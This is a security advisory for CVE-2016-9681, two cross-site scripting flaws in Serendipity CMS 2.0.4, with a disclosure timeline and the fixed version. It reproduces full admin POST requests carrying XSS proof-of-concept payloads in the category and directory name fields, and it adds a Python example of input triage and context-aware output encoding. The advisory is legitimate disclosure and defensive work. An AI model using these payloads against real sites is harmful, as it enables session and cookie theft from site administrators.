
[CVE-2016-9681] Serendipity CMS – XSS Vulnerability in Version 2.0.4


Product Information:

Software: Serendipity CMS

Tested Version: 2.0.4, released 26.09.2016

Vulnerability Type: Cross-Site Scripting (CWE-79)

Download link: https://github.com/s9y/Serendipity/releases/tag/2.0.4

Description: Serendipity is a PHP-powered weblog engine which gives the user an easy way to maintain a blog. While the default package is designed for the casual blogger, Serendipity offers an expandable framework with the power for professional applications. (copied from https://docs.s9y.org/)


Vulnerability description:

There are two XSS vulnerabilities in Serendipity CMS:

1) XSS in the new category creation page

2) XSS in the base directory creation page

Category Page


When an authenticated user of Serendipity CMS is creating a new category, the following POST request is sent to the server:


POST /s9y/serendipity_admin.php?serendipity[adminModule]=category&serendipity[adminAction]=new HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/s9y/serendipity_admin.php?serendipity[adminModule]=category&serendipity[adminAction]=new
Cookie: serendipity[old_session]=u4l95320lc39fen9n2f8o04jm5; serendipity[userDefLang]=en; serendipity[addmedia_directory]=undefined; serendipity[sortorder_perpage]=8; serendipity[sortorder_order]=i.name; serendipity[sortorder_ordermode]=DESC; serendipity[only_path]=; serendipity[only_filename]=; serendipity[toggle_extended]=true; serendipity[entrylist_filter_author]=; serendipity[entrylist_filter_category]=; serendipity[entrylist_filter_isdraft]=; serendipity[entrylist_sort_perPage]=; serendipity[entrylist_sort_ordermode]=; serendipity[entrylist_sort_order]=; accessibletab_mediaupload_tabs_active=1; serendipity[imgThumbWidth]=400; serendipity[imgThumbHeight]=400; serendipity[imgWidth]=480; serendipity[imgHeight]=480; serendipity[imgID]=5; serendipity[baseURL]=http://127.0.0.1/s9y/; serendipity[indexFile]=index.php; serendipity[imgName]=/s9y/uploads/img_src1_onerroralert1223e.png; serendipity[thumbName]=/s9y/uploads/img_src1_onerroralert1223e.serendipityThumb.png; serendipity[hotlink]=; serendipity[serendipity_htmltarget]=category_icon; serendipity[serendipity_filename_only]=true; serendipity[serendipity_linkThumbnail]=no; serendipity[]=Done; serendipity[author_token]=9e3d614472aa8c3659f653b47fd193a31777f150; s9y_9afefbce28571f388f27f61da1993391=u4l95320lc39fen9n2f8o04jm5
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 380
  
serendipity[token]=355e14e9bde891a03aef7cc5b19d8fab&serendipity[cat][name]=<script>alert(0)</script>&serendipity[cat][description]=&serendipity[cat][parent_cat]=0&serendipity[cat][hide_sub]=0&serendipity[cat][read_authors][]=0&serendipity[cat][write_authors][]=0&serendipity[cat][icon]=&SAVE=Create

The parameter serendipity[cat][name] is vulnerable to XSS.

The payload is executed when an authenticated user creates another category.

Base Directory Page


When an authenticated user of Serendipity CMS is creating a new base directory, the following POST request is sent to the server:


POST /s9y/serendipity_admin.php?serendipity[step]=directoryDoCreate&serendipity[adminModule]=images&serendipity[adminAction]=directoryDoCreate HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/s9y/serendipity_admin.php?serendipity[adminModule]=images&serendipity[adminAction]=directoryCreate
Cookie: serendipity[old_session]=u4l95320lc39fen9n2f8o04jm5; serendipity[userDefLang]=en; serendipity[addmedia_directory]=undefined; serendipity[sortorder_perpage]=8; serendipity[sortorder_order]=i.name; serendipity[sortorder_ordermode]=DESC; serendipity[only_path]=; serendipity[only_filename]=; serendipity[toggle_extended]=true; serendipity[entrylist_filter_author]=; serendipity[entrylist_filter_category]=; serendipity[entrylist_filter_isdraft]=; serendipity[entrylist_sort_perPage]=; serendipity[entrylist_sort_ordermode]=; serendipity[entrylist_sort_order]=; accessibletab_mediaupload_tabs_active=1; serendipity[imgThumbWidth]=400; serendipity[imgThumbHeight]=400; serendipity[imgWidth]=480; serendipity[imgHeight]=480; serendipity[imgID]=5; serendipity[baseURL]=http://127.0.0.1/s9y/; serendipity[indexFile]=index.php; serendipity[imgName]=/s9y/uploads/img_src1_onerroralert1223e.png; serendipity[thumbName]=/s9y/uploads/img_src1_onerroralert1223e.serendipityThumb.png; serendipity[hotlink]=; serendipity[serendipity_htmltarget]=category_icon; serendipity[serendipity_filename_only]=true; serendipity[serendipity_linkThumbnail]=no; serendipity[]=Done; serendipity[author_token]=31fd07e44a90a6bd7a8a03010660df86790eb948; s9y_9afefbce28571f388f27f61da1993391=u4l95320lc39fen9n2f8o04jm5
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 171

serendipity[token]=355e14e9bde891a03aef7cc5b19d8fab&serendipity[name]=</script><svg onload=alert(0)>&serendipity[parent]=&SAVE=Create directory

The parameter serendipity[name] is vulnerable to reflected XSS.

The payload is executed immediately upon creating the new directory and it occurs only once.
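Both findings above come down to the same root cause: a user-supplied name is written back into an admin page without output encoding. The following Python example is added here for illustration and is not taken from Serendipity's code base or from the vendor's fix. It shows the defensive side: decoding a form body like the ones captured above, flagging fields that carry markup for log review, and encoding the value for the output context it lands in. The two rendering contexts (HTML text for the category name, an inline script for the directory name, which the `</script>` prefix of the second payload is shaped to break out of) are assumptions made for the example, not a statement about where Serendipity 2.0.4 actually placed these values; the template fragments and the sample body are constructed.

```python
import html
import json
from urllib.parse import parse_qs

# Constructed inputs: the two payloads quoted in the advisory, as they arrive
# in the decoded POST body.
CATEGORY_PAYLOAD = "<script>alert(0)</script>"
DIRECTORY_PAYLOAD = "</script><svg onload=alert(0)>"

# Constructed sample body, modelled on the category-creation request above.
SAMPLE_CATEGORY_BODY = (
    "serendipity[token]=355e14e9bde891a03aef7cc5b19d8fab"
    "&serendipity[cat][name]=<script>alert(0)</script>"
    "&serendipity[cat][description]=&serendipity[cat][parent_cat]=0"
    "&serendipity[cat][hide_sub]=0&serendipity[cat][read_authors][]=0"
    "&serendipity[cat][write_authors][]=0&serendipity[cat][icon]=&SAVE=Create"
)


def parse_form_body(body: str) -> dict:
    """Decode an application/x-www-form-urlencoded body into a flat dict.

    Only the first value of each field is kept; blank values are retained so
    that empty fields are still visible to the caller.
    """
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def fields_with_markup(body: str) -> list:
    """Names of fields whose decoded value contains HTML-active characters.

    This is a coarse triage heuristic for log review or a WAF rule, not a
    replacement for output encoding: a value that passes this check can still
    be dangerous in an attribute or script context.
    """
    return [k for k, v in parse_form_body(body).items() if "<" in v or ">" in v]


def encode_for_html_text(value: str) -> str:
    """Encode for insertion between tags or inside a quoted attribute."""
    return html.escape(value, quote=True)


def encode_for_js_string(value: str) -> str:
    """Encode for insertion inside an inline <script> block as a JS string.

    json.dumps handles quotes, backslashes and control characters; '<', '>'
    and '&' are additionally written as \\uXXXX escapes so the byte sequence
    '</script>' can never appear in the output and close the element early.
    HTML-escaping alone is the wrong tool here, since the HTML parser does not
    decode entities inside <script>.
    """
    s = json.dumps(value)
    return s.replace("<", "\\u003c").replace(">", "\\u003e").replace("&", "\\u0026")


def render_category_row(name: str) -> str:
    """Hypothetical template fragment: the name lands in HTML text context."""
    return '<li class="category">' + encode_for_html_text(name) + "</li>"


def render_directory_script(name: str) -> str:
    """Hypothetical template fragment: the name lands inside an inline script."""
    return "<script>var newDir = " + encode_for_js_string(name) + ";</script>"


if __name__ == "__main__":
    print("fields carrying markup:", fields_with_markup(SAMPLE_CATEGORY_BODY))
    print(render_category_row(CATEGORY_PAYLOAD))
    print(render_directory_script(DIRECTORY_PAYLOAD))
```

The point of keeping two encoders is that the safe transformation depends on where the value is emitted: `html.escape` is correct for the category list but would leave the directory name as literal `&lt;/script&gt;` text inside the script, while the JSON-plus-`\u003c` form keeps the script element intact and yields the original string once the browser evaluates it.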


Impact:

An attacker is able to inject malicious scripts into otherwise benign and trusted web sites. The malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site. These scripts can also rewrite the contents of an HTML page. The exploitation process is also made easy with BeEF (The Browser Exploitation Framework).


Solution:

Update to the latest version, which is 2.0.5, see https://blog.s9y.org/archives/271-Serendipity-2.0.5-and-2.1-beta3-released.html


Timeline:

Vulnerability found: 25.11.2016

Vendor informed: 26.11.2016

Response by vendor: 28.11.2016

Fix by vendor: 28.11.2016

Public Advisory: 03.12.2016


Reference:

https://github.com/s9y/Serendipity/commit/e2a665e13b7de82a71c9bbb77575d15131b722be